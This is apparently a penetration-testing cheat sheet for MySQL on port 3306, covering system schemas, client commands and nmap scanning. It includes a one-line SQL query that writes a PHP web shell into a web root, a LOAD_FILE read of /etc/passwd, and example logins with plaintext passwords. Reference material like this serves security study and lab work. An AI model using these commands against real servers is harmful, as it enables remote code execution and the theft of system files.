MYSQL - 3306

• MySQL default system schemas/databases:

  • mysql - is the system database that contains tables that store information required by the MySQL server

  • information_schema - provides access to database metadata

  • performance_schema - is a feature for monitoring MySQL Server execution at a low level

  • sys - a set of objects that helps DBAs and developers interpret data collected by the Performance Schema

Command	Description
mysql -u <user> -p<password> <IP address>	Connect to the MySQL server. There should not be a space between the '-p' flag, and the password.
show databases;	Show all databases.
use <database>;	Select one of the existing databases.
show tables;	Show all available tables in the selected database.
show columns from <table>;	Show all columns in the selected database.
select * from <table>;	Show everything in the desired table.
select * from <table> where <column> = "<string>";	Search for needed string in the desired table.

Interaction with the MySQL Server

# mysql - Linux

# Connecting to MySQL Server using valid creds
mysql -u root -pP4SSw0rd ip

# After Connecting, Some useful commands
show databases;
select version();
use mysql;
show tables;
select host, users from summary;

# mysql.exe - Windows
C:\> mysql.exe -u username -pPassword123 -h ip

# MySQL - Write Local File
SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php';

# MySQL - Secure File Privileges
show variables like "secure_file_priv";

# MySQL - Read Local Files in MySQL
select LOAD_FILE("/etc/passwd");

Nmap

# Scanning MySQL Server
nmap ip -sV -sC -p3306 --script mysql*